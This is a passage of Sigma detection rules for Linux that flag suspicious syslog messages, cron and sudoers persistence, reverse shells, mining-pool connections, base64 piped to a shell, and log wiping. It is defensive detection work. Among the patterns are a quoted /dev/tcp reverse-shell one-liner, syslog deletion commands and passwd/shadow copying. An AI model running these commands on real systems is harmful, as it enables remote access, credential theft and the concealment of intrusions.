sudo 23 | detection: 24 | 
selection_user: 25 | USER: 26 | - '#-*' 27 | - '#*4294967295' 28 | condition: selection_user 29 | falsepositives: 30 | - Unlikely 31 | level: critical 32 | -------------------------------------------------------------------------------- /rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml: -------------------------------------------------------------------------------- 1 | title: Disabling Security Tools - Builtin 2 | id: 49f5dfc1-f92e-4d34-96fa-feba3f6acf36 3 | related: 4 | - id: e3a8a052-111f-4606-9aee-f28ebeb76776 5 | type: derived 6 | status: test 7 | description: Detects the disabling of security tools 8 | references: 9 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md 10 | author: Ömer Günal, Alejandro Ortuno, oscd.community 11 | date: 2020/06/17 12 | modified: 2022/11/26 13 | tags: 14 | - attack.defense_evasion 15 | - attack.t1562.004 16 | logsource: 17 | product: linux 18 | service: syslog 19 | detection: 20 | keywords: 21 | - 'stopping iptables' 22 | - 'stopping ip6tables' 23 | - 'stopping firewalld' 24 | - 'stopping cbdaemon' 25 | - 'stopping falcon-sensor' 26 | condition: keywords 27 | falsepositives: 28 | - Legitimate administration activities 29 | level: medium 30 | -------------------------------------------------------------------------------- /rules/linux/builtin/syslog/lnx_syslog_susp_named.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious Named Error 2 | id: c8e35e96-19ce-4f16-aeb6-fd5588dc5365 3 | status: test 4 | description: Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploitation attempts 5 | references: 6 | - https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/named_rules.xml 7 | author: Florian Roth (Nextron Systems) 8 | date: 2018/02/20 9 | modified: 2022/10/05 10 | tags: 11 | - 
attack.initial_access 12 | - attack.t1190 13 | logsource: 14 | product: linux 15 | service: syslog 16 | detection: 17 | keywords: 18 | - ' dropping source port zero packet from ' 19 | - ' denied AXFR from ' 20 | - ' exiting (due to fatal error)' 21 | condition: keywords 22 | falsepositives: 23 | - Unknown 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/builtin/vsftpd/lnx_vsftpd_susp_error_messages.yml: -------------------------------------------------------------------------------- 1 | title: Suspicious VSFTPD Error Messages 2 | id: 377f33a1-4b36-4ee1-acee-1dbe4b43cfbe 3 | status: test 4 | description: Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts 5 | references: 6 | - https://github.com/dagwieers/vsftpd/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2017/07/05 9 | modified: 2021/11/27 10 | tags: 11 | - attack.initial_access 12 | - attack.t1190 13 | logsource: 14 | product: linux 15 | service: vsftpd 16 | detection: 17 | keywords: 18 | - 'Connection refused: too many sessions for this address.' 19 | - 'Connection refused: tcp_wrappers denial.' 20 | - 'Bad HTTP verb.' 21 | - 'port and pasv both active' 22 | - 'pasv and port both active' 23 | - 'Transfer done (but failed to open directory).' 24 | - 'Could not set file modification time.' 25 | - 'bug: pid active in ptrace_sandbox_free' 26 | - 'PTRACE_SETOPTIONS failure' 27 | - 'weird status:' 28 | - 'couldn''t handle sandbox event' 29 | - 'syscall * out of bounds' 30 | - 'syscall not permitted:' 31 | - 'syscall validate failed:' 32 | - 'Input line too long.' 
33 | - 'poor buffer accounting in str_netfd_alloc' 34 | - 'vsf_sysutil_read_loop' 35 | condition: keywords 36 | falsepositives: 37 | - Unknown 38 | level: medium 39 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_doas_conf_creation.yml: -------------------------------------------------------------------------------- 1 | title: Linux Doas Conf File Creation 2 | id: 00eee2a5-fdb0-4746-a21d-e43fbdea5681 3 | status: stable 4 | description: Detects the creation of the doas.conf file on a Linux host platform. 5 | references: 6 | - https://research.splunk.com/endpoint/linux_doas_conf_file_creation/ 7 | - https://www.makeuseof.com/how-to-install-and-use-doas/ 8 | author: Sittikorn S, Teoderick Contreras 9 | date: 2022/01/20 10 | modified: 2022/12/31 11 | tags: 12 | - attack.privilege_escalation 13 | - attack.t1548 14 | logsource: 15 | product: linux 16 | category: file_event 17 | detection: 18 | selection: 19 | TargetFilename|endswith: '/etc/doas.conf' 20 | condition: selection 21 | falsepositives: 22 | - Unlikely 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_persistence_cron_files.yml: -------------------------------------------------------------------------------- 1 | title: Persistence Via Cron Files 2 | id: 6c4e2f43-d94d-4ead-b64d-97e53fa2bd05 3 | status: test 4 | description: Detects creation of a cron file or files in cron directories, which could indicate potential persistence. 
5 | references: 6 | - https://github.com/microsoft/MSTIC-Sysmon/blob/f1477c0512b0747c1455283069c21faec758e29d/linux/configs/attack-based/persistence/T1053.003_Cron_Activity.xml 7 | author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 8 | date: 2021/10/15 9 | modified: 2022/12/31 10 | tags: 11 | - attack.persistence 12 | - attack.t1053.003 13 | logsource: 14 | product: linux 15 | category: file_event 16 | detection: 17 | selection1: 18 | TargetFilename|startswith: 19 | - '/etc/cron.d/' 20 | - '/etc/cron.daily/' 21 | - '/etc/cron.hourly/' 22 | - '/etc/cron.monthly/' 23 | - '/etc/cron.weekly/' 24 | - '/var/spool/cron/crontabs/' 25 | selection2: 26 | TargetFilename|contains: 27 | - '/etc/cron.allow' 28 | - '/etc/cron.deny' 29 | - '/etc/crontab' 30 | condition: 1 of selection* 31 | falsepositives: 32 | - Any legitimate cron file. 33 | level: medium 34 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_persistence_sudoers_files.yml: -------------------------------------------------------------------------------- 1 | title: Persistence Via Sudoers Files 2 | id: ddb26b76-4447-4807-871f-1b035b2bfa5d 3 | status: test 4 | description: Detects creation of a sudoers file or files in the "sudoers.d" directory, which can be used as a potential method to persist privileges for a specific user. 
5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/apps/deployer.sh 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | modified: 2022/12/31 10 | tags: 11 | - attack.persistence 12 | - attack.t1053.003 13 | logsource: 14 | product: linux 15 | category: file_event 16 | detection: 17 | selection: 18 | TargetFilename|startswith: '/etc/sudoers.d/' 19 | condition: selection 20 | falsepositives: 21 | - Creation of legitimate files in sudoers.d folder part of administrator work 22 | level: medium 23 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_susp_shell_script_under_profile_directory.yml: -------------------------------------------------------------------------------- 1 | title: Potentially Suspicious Shell Script Creation in Profile Folder 2 | id: 13f08f54-e705-4498-91fd-cce9d9cee9f1 3 | status: experimental 4 | description: Detects the creation of shell scripts under the "profile.d" path. 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.persistence 14 | logsource: 15 | product: linux 16 | category: file_event 17 | detection: 18 | selection: 19 | TargetFilename|contains: '/etc/profile.d/' 20 | TargetFilename|endswith: 21 | - '.csh' 22 | - '.sh' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate shell scripts in the "profile.d" directory could be common in your environment. 
Apply additional filter accordingly via "image", by adding specific filenames you "trust" or by correlating it with other events. 26 | - Regular file creation during system update or software installation by the package manager 27 | level: low # Can be increased to a higher level after some tuning 28 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_triple_cross_rootkit_lock_file.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Default LockFile 2 | id: c0239255-822c-4630-b7f1-35362bcb8f44 3 | status: test 4 | description: Detects the creation of the file "rootlog" which is used by the TripleCross rootkit as a way to check if the backdoor is already running. 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/1f1c3e0958af8ad9f6ebe10ab442e75de33e91de/src/helpers/execve_hijack.c#L33 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | modified: 2022/12/31 10 | tags: 11 | - attack.defense_evasion 12 | logsource: 13 | product: linux 14 | category: file_event 15 | detection: 16 | selection: 17 | TargetFilename: '/tmp/rootlog' 18 | condition: selection 19 | falsepositives: 20 | - Unlikely 21 | level: high 22 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_triple_cross_rootkit_persistence.yml: -------------------------------------------------------------------------------- 1 | title: Triple Cross eBPF Rootkit Default Persistence 2 | id: 1a2ea919-d11d-4d1e-8535-06cda13be20f 3 | status: test 4 | description: Detects the creation of "ebpfbackdoor" files in both "cron.d" and "sudoers.d" directories. 
Both are related to the TripleCross persistence method 5 | references: 6 | - https://github.com/h3xduck/TripleCross/blob/12629558b8b0a27a5488a0b98f1ea7042e76f8ab/apps/deployer.sh 7 | author: Nasreddine Bencherchali (Nextron Systems) 8 | date: 2022/07/05 9 | modified: 2022/12/31 10 | tags: 11 | - attack.persistence 12 | - attack.defense_evasion 13 | - attack.t1053.003 14 | 15 | logsource: 16 | product: linux 17 | category: file_event 18 | detection: 19 | selection: 20 | TargetFilename|endswith: 'ebpfbackdoor' 21 | condition: selection 22 | falsepositives: 23 | - Unlikely 24 | level: high 25 | -------------------------------------------------------------------------------- /rules/linux/file_event/file_event_lnx_wget_download_file_in_tmp_dir.yml: -------------------------------------------------------------------------------- 1 | title: Wget Creating Files in Tmp Directory 2 | id: 35a05c60-9012-49b6-a11f-6bab741c9f74 3 | status: experimental 4 | description: Detects the use of wget to download content into a temporary directory such as "/tmp" or "/var/tmp" 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.command_and_control 14 | - attack.t1105 15 | logsource: 16 | product: linux 17 | category: file_event 18 | detection: 19 | selection: 20 | Image|endswith: '/wget' 21 | TargetFilename|startswith: 22 | - '/tmp/' 23 | - '/var/tmp/' 24 | condition: selection 25 | falsepositives: 26 | - Legitimate downloads of files in the tmp folder. 
27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/network_connection/net_connection_lnx_back_connect_shell_dev.yml: -------------------------------------------------------------------------------- 1 | title: Linux Reverse Shell Indicator 2 | id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871 3 | status: test 4 | description: Detects a bash process connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1') 5 | references: 6 | - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/16 9 | modified: 2022/12/25 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | product: linux 15 | category: network_connection 16 | detection: 17 | selection: 18 | Image|endswith: '/bin/bash' 19 | filter: 20 | DestinationIp: 21 | - '127.0.0.1' 22 | - '0.0.0.0' 23 | condition: selection and not filter 24 | falsepositives: 25 | - Unknown 26 | level: critical 27 | -------------------------------------------------------------------------------- /rules/linux/network_connection/net_connection_lnx_crypto_mining_indicators.yml: -------------------------------------------------------------------------------- 1 | title: Linux Crypto Mining Pool Connections 2 | id: a46c93b7-55ed-4d27-a41b-c259456c4746 3 | status: stable 4 | description: Detects process connections to a Monero crypto mining pool 5 | references: 6 | - https://www.poolwatch.io/coin/monero 7 | author: Florian Roth (Nextron Systems) 8 | date: 2021/10/26 9 | tags: 10 | - attack.impact 11 | - attack.t1496 12 | logsource: 13 | product: linux 14 | category: network_connection 15 | detection: 16 | selection: 17 | DestinationHostname: 18 | - 'pool.minexmr.com' 19 | - 'fr.minexmr.com' 20 | - 'de.minexmr.com' 21 | - 'sg.minexmr.com' 22 | - 
'ca.minexmr.com' 23 | - 'us-west.minexmr.com' 24 | - 'pool.supportxmr.com' 25 | - 'mine.c3pool.com' 26 | - 'xmr-eu1.nanopool.org' 27 | - 'xmr-eu2.nanopool.org' 28 | - 'xmr-us-east1.nanopool.org' 29 | - 'xmr-us-west1.nanopool.org' 30 | - 'xmr-asia1.nanopool.org' 31 | - 'xmr-jp1.nanopool.org' 32 | - 'xmr-au1.nanopool.org' 33 | - 'xmr.2miners.com' 34 | - 'xmr.hashcity.org' 35 | - 'xmr.f2pool.com' 36 | - 'xmrpool.eu' 37 | - 'pool.hashvault.pro' 38 | - 'moneroocean.stream' 39 | - 'monerocean.stream' 40 | condition: selection 41 | falsepositives: 42 | - Legitimate use of crypto miners 43 | level: high 44 | -------------------------------------------------------------------------------- /rules/linux/network_connection/net_connection_lnx_ngrok_tunnel.yml: -------------------------------------------------------------------------------- 1 | title: Communication To Ngrok Tunneling Service - Linux 2 | id: 19bf6fdb-7721-4f3d-867f-53467f6a5db6 3 | status: test 4 | description: Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data by malicious actors 5 | references: 6 | - https://twitter.com/hakluke/status/1587733971814977537/photo/1 7 | - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent 8 | author: Florian Roth (Nextron Systems) 9 | date: 2022/11/03 10 | tags: 11 | - attack.exfiltration 12 | - attack.command_and_control 13 | - attack.t1567 14 | - attack.t1568.002 15 | - attack.t1572 16 | - attack.t1090 17 | - attack.t1102 18 | - attack.s0508 19 | logsource: 20 | product: linux 21 | category: network_connection 22 | detection: 23 | selection: 24 | DestinationHostname|contains: 25 | - 'tunnel.us.ngrok.com' 26 | - 'tunnel.eu.ngrok.com' 27 | - 'tunnel.ap.ngrok.com' 28 | - 'tunnel.au.ngrok.com' 29 | - 'tunnel.sa.ngrok.com' 30 | - 'tunnel.jp.ngrok.com' 31 | - 'tunnel.in.ngrok.com' 32 | condition: selection 33 | falsepositives: 34 | - Legitimate use of ngrok 35 | level: high 36 | 
-------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_at_command.yml: -------------------------------------------------------------------------------- 1 | title: Scheduled Task/Job At 2 | id: d2d642d7-b393-43fe-bae4-e81ed5915c4b 3 | status: stable 4 | description: | 5 | Detects the use of at/atd which are utilities that are used to schedule tasks. 6 | They are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code 7 | references: 8 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md 9 | author: Ömer Günal, oscd.community 10 | date: 2020/10/06 11 | modified: 2022/07/07 12 | tags: 13 | - attack.persistence 14 | - attack.t1053.002 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: 21 | - '/at' 22 | - '/atd' 23 | condition: selection 24 | falsepositives: 25 | - Legitimate administration activities 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_base64_decode.yml: -------------------------------------------------------------------------------- 1 | title: Decode Base64 Encoded Text 2 | id: e2072cab-8c9a-459b-b63c-40ae79e27031 3 | status: test 4 | description: Detects usage of base64 utility to decode arbitrary base64-encoded text 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md 7 | author: Daniil Yugoslavskiy, oscd.community 8 | date: 2020/10/19 9 | modified: 2021/11/27 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1027 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: '/base64' 19 | CommandLine|contains: 
'-d' # Also covers "--decode" 20 | condition: selection 21 | falsepositives: 22 | - Legitimate activities 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_base64_execution.yml: -------------------------------------------------------------------------------- 1 | title: Linux Base64 Encoded Pipe to Shell 2 | id: ba592c6d-6888-43c3-b8c6-689b8fe47337 3 | status: experimental 4 | description: Detects suspicious process command line that uses base64 encoded input for execution with a shell 5 | references: 6 | - https://github.com/arget13/DDexec 7 | - https://www.mandiant.com/resources/blog/barracuda-esg-exploited-globally 8 | author: pH-T (Nextron Systems) 9 | date: 2022/07/26 10 | modified: 2023/06/16 11 | tags: 12 | - attack.defense_evasion 13 | - attack.t1140 14 | logsource: 15 | product: linux 16 | category: process_creation 17 | detection: 18 | selection_base64: 19 | CommandLine|contains: 'base64 ' 20 | selection_exec: 21 | - CommandLine|contains: 22 | - '| bash ' 23 | - '| sh ' 24 | - '|bash ' 25 | - '|sh ' 26 | - CommandLine|endswith: 27 | - ' |sh' 28 | - '| bash' 29 | - '| sh' 30 | - '|bash' 31 | condition: all of selection_* 32 | falsepositives: 33 | - Legitimate administration activities 34 | level: medium 35 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_base64_shebang_cli.yml: -------------------------------------------------------------------------------- 1 | title: Linux Base64 Encoded Shebang In CLI 2 | id: fe2f9663-41cb-47e2-b954-8a228f3b9dff 3 | status: test 4 | description: Detects the presence of a base64 version of the shebang in the commandline, which could indicate a malicious payload about to be decoded 5 | references: 6 | - https://www.trendmicro.com/pl_pl/research/20/i/the-evolution-of-malicious-shell-scripts.html 7 | - 
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS 8 | author: Nasreddine Bencherchali (Nextron Systems) 9 | date: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1140 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - "IyEvYmluL2Jhc2" # Note: #!/bin/bash" 20 | - "IyEvYmluL2Rhc2" # Note: #!/bin/dash" 21 | - "IyEvYmluL3pza" # Note: #!/bin/zsh" 22 | - "IyEvYmluL2Zpc2" # Note: #!/bin/fish 23 | - "IyEvYmluL3No" # Note: # !/bin/sh" 24 | condition: selection 25 | falsepositives: 26 | - Legitimate administration activities 27 | level: medium 28 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_bash_interactive_shell.yml: -------------------------------------------------------------------------------- 1 | title: Bash Interactive Shell 2 | id: 6104e693-a7d6-4891-86cb-49a258523559 3 | status: experimental 4 | description: Detects execution of the bash shell with the interactive flag "-i". 
5 | references: 6 | - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet 7 | - https://www.revshells.com/ 8 | - https://linux.die.net/man/1/bash 9 | author: '@d4ns4n_' 10 | date: 2023/04/07 11 | tags: 12 | - attack.execution 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: '/bash' 19 | CommandLine|contains: ' -i ' 20 | condition: selection 21 | falsepositives: 22 | - Unknown 23 | level: low 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_bpf_kprob_tracing_enabled.yml: -------------------------------------------------------------------------------- 1 | title: Enable BPF Kprobes Tracing 2 | id: 7692f583-bd30-4008-8615-75dab3f08a99 3 | status: experimental 4 | description: Detects common command used to enable bpf kprobes tracing 5 | references: 6 | - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ 7 | - https://bpftrace.org/ 8 | - https://www.kernel.org/doc/html/v5.0/trace/kprobetrace.html 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2023/01/25 11 | tags: 12 | - attack.execution 13 | - attack.defense_evasion 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | CommandLine|contains|all: 20 | - 'echo 1 >' 21 | - '/sys/kernel/debug/tracing/events/kprobes/' 22 | CommandLine|contains: 23 | - '/myprobe/enable' 24 | - '/myretprobe/enable' 25 | condition: selection 26 | falsepositives: 27 | - Unknown 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_bpftrace_unsafe_option_usage.yml: -------------------------------------------------------------------------------- 1 | title: BPFtrace Unsafe Option Usage 2 | id: f8341cb2-ee25-43fa-a975-d8a5a9714b39 3 | status: test 4 | description: Detects the usage of the unsafe 
bpftrace option 5 | references: 6 | - https://embracethered.com/blog/posts/2021/offensive-bpf-bpftrace/ 7 | - https://bpftrace.org/ 8 | author: Andreas Hunkeler (@Karneades) 9 | date: 2022/02/11 10 | tags: 11 | - attack.execution 12 | - attack.t1059.004 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 'bpftrace' 19 | CommandLine|contains: '--unsafe' 20 | condition: selection 21 | falsepositives: 22 | - Legitimate usage of the unsafe option 23 | level: medium 24 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_capa_discovery.yml: -------------------------------------------------------------------------------- 1 | title: Capabilities Discovery - Linux 2 | id: d8d97d51-122d-4cdd-9e2f-01b4b4933530 3 | status: test 4 | description: Detects usage of "getcap" binary. This is often used during recon activity to determine potential binaries that can be abused as GTFOBins or other. 
5 | references: 6 | - https://github.com/SaiSathvik1/Linux-Privilege-Escalation-Notes 7 | - https://github.com/carlospolop/PEASS-ng 8 | - https://github.com/diego-treitos/linux-smart-enumeration 9 | author: Nasreddine Bencherchali (Nextron Systems) 10 | date: 2022/12/28 11 | tags: 12 | - attack.discovery 13 | - attack.t1083 14 | logsource: 15 | category: process_creation 16 | product: linux 17 | detection: 18 | selection: 19 | Image|endswith: '/getcap' 20 | CommandLine|contains: 21 | - ' /r ' 22 | - ' -r ' 23 | condition: selection 24 | falsepositives: 25 | - Unknown 26 | level: low 27 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cat_sudoers.yml: -------------------------------------------------------------------------------- 1 | title: Cat Sudoers 2 | id: 0f79c4d2-4e1f-4683-9c36-b5469a665e06 3 | status: test 4 | description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights 5 | references: 6 | - https://github.com/sleventyeleven/linuxprivchecker/ 7 | author: Florian Roth (Nextron Systems) 8 | date: 2022/06/20 9 | modified: 2022/09/15 10 | tags: 11 | - attack.reconnaissance 12 | - attack.t1592.004 13 | logsource: 14 | category: process_creation 15 | product: linux 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/cat' 20 | - 'grep' 21 | - '/head' 22 | - '/tail' 23 | - '/more' 24 | CommandLine|contains: ' /etc/sudoers' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administration activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_chattr_immutable_removal.yml: -------------------------------------------------------------------------------- 1 | title: Remove Immutable File Attribute 2 | id: 34979410-e4b5-4e5d-8cfb-389fdff05c12 3 | related: 4 | - id: a5b977d6-8a81-4475-91b9-49dbfcd941f7 5 | type: derived 6 | 
status: test 7 | description: Detects usage of the 'chattr' utility to remove immutable file attribute. 8 | references: 9 | - https://www.trendmicro.com/en_us/research/22/i/how-malicious-actors-abuse-native-linux-tools-in-their-attacks.html 10 | author: Nasreddine Bencherchali (Nextron Systems) 11 | date: 2022/09/15 12 | tags: 13 | - attack.defense_evasion 14 | - attack.t1222.002 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/chattr' 21 | CommandLine|contains: ' -i ' 22 | condition: selection 23 | falsepositives: 24 | - Administrator interacting with immutable files (e.g. for instance backups). 25 | level: medium 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_clear_logs.yml: -------------------------------------------------------------------------------- 1 | title: Clear Linux Logs 2 | id: 80915f59-9b56-4616-9de0-fd0dea6c12fe 3 | status: stable 4 | description: Detects attempts to clear logs on the system. 
Adversaries may clear system logs to hide evidence of an intrusion 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md 7 | author: Ömer Günal, oscd.community 8 | date: 2020/10/07 9 | modified: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.002 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | Image|endswith: 19 | - '/rm' # covers /rmdir as well 20 | - '/shred' 21 | - '/unlink' 22 | CommandLine|contains: 23 | - '/var/log' 24 | - '/var/spool/mail' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate administration activities 28 | level: medium 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_clear_syslog.yml: -------------------------------------------------------------------------------- 1 | title: Commands to Clear or Remove the Syslog 2 | id: 3fcc9b35-39e4-44c0-a2ad-9e82b6902b31 3 | status: test 4 | description: Detects specific commands commonly used to remove or empty the syslog. 
This is often used by attackers as a method to hide their tracks 5 | references: 6 | - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md 7 | author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 8 | date: 2021/10/15 9 | modified: 2022/09/15 10 | tags: 11 | - attack.defense_evasion 12 | - attack.t1070.002 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection: 18 | CommandLine|contains: 19 | - 'rm /var/log/syslog' 20 | - 'rm -r /var/log/syslog' 21 | - 'rm -f /var/log/syslog' 22 | - 'rm -rf /var/log/syslog' 23 | - 'unlink /var/log/syslog' 24 | - 'unlink -r /var/log/syslog' 25 | - 'unlink -f /var/log/syslog' 26 | - 'unlink -rf /var/log/syslog' 27 | - 'mv /var/log/syslog' 28 | - ' >/var/log/syslog' 29 | - ' > /var/log/syslog' 30 | condition: selection 31 | falsepositives: 32 | - Log rotation. 33 | level: high 34 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_clipboard_collection.yml: -------------------------------------------------------------------------------- 1 | title: Clipboard Collection with Xclip Tool 2 | id: ec127035-a636-4b9a-8555-0efd4e59f316 3 | status: test 4 | description: | 5 | Detects attempts to collect data stored in the clipboard from users with the usage of the xclip tool. Xclip has to be installed. 6 | Using this rule on servers is highly recommended, due to the high usage of clipboard utilities on user workstations. 
7 | references: 8 | - https://www.packetlabs.net/posts/clipboard-data-security/ 9 | author: Pawel Mazur, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC 10 | date: 2021/10/15 11 | modified: 2022/09/15 12 | tags: 13 | - attack.collection 14 | - attack.t1115 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|contains: 'xclip' 21 | CommandLine|contains|all: 22 | - '-sel' 23 | - 'clip' 24 | - '-o' 25 | condition: selection 26 | falsepositives: 27 | - Legitimate usage of xclip tools. 28 | level: low 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_cp_passwd_or_shadow_tmp.yml: -------------------------------------------------------------------------------- 1 | title: Copy Passwd Or Shadow From TMP Path 2 | id: fa4aaed5-4fe0-498d-bbc0-08e3346387ba 3 | status: experimental 4 | description: Detects when the file "passwd" or "shadow" is copied from tmp path 5 | references: 6 | - https://blogs.blackberry.com/ 7 | - https://twitter.com/Joseliyo_Jstnk/status/1620131033474822144 8 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 9 | date: 2023/01/31 10 | tags: 11 | - attack.credential_access 12 | - attack.t1552.001 13 | logsource: 14 | product: linux 15 | category: process_creation 16 | detection: 17 | selection_img: 18 | Image|endswith: '/cp' 19 | selection_path: 20 | CommandLine|contains: '/tmp/' 21 | selection_file: 22 | CommandLine|contains: 23 | - 'passwd' 24 | - 'shadow' 25 | condition: all of selection_* 26 | falsepositives: 27 | - Unknown 28 | level: high 29 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_crontab_enumeration.yml: -------------------------------------------------------------------------------- 1 | title: Crontab Enumeration 2 | id: 403ed92c-b7ec-4edd-9947-5b535ee12d46 3 | status: experimental 4 | description: Detects 
usage of crontab to list the tasks of the user 5 | references: 6 | - https://blogs.jpcert.or.jp/en/2023/05/gobrat.html 7 | - https://jstnk9.github.io/jstnk9/research/GobRAT-Malware/ 8 | - https://www.virustotal.com/gui/file/60bcd645450e4c846238cf0e7226dc40c84c96eba99f6b2cffcd0ab4a391c8b3/detection 9 | - https://www.virustotal.com/gui/file/3e44c807a25a56f4068b5b8186eee5002eed6f26d665a8b791c472ad154585d1/detection 10 | author: Joseliyo Sanchez, @Joseliyo_Jstnk 11 | date: 2023/06/02 12 | tags: 13 | - attack.discovery 14 | - attack.t1007 15 | logsource: 16 | product: linux 17 | category: process_creation 18 | detection: 19 | selection: 20 | Image|endswith: '/crontab' 21 | CommandLine|contains: ' -l' 22 | condition: selection 23 | falsepositives: 24 | - Legitimate use of crontab 25 | level: low 26 | -------------------------------------------------------------------------------- /rules/linux/process_creation/proc_creation_lnx_crontab_removal.yml: -------------------------------------------------------------------------------- 1 | title: Remove Scheduled Cron Task/Job 2 | id: c2e234de-03a3-41e1-b39a-1e56dc17ba67 3 | status: 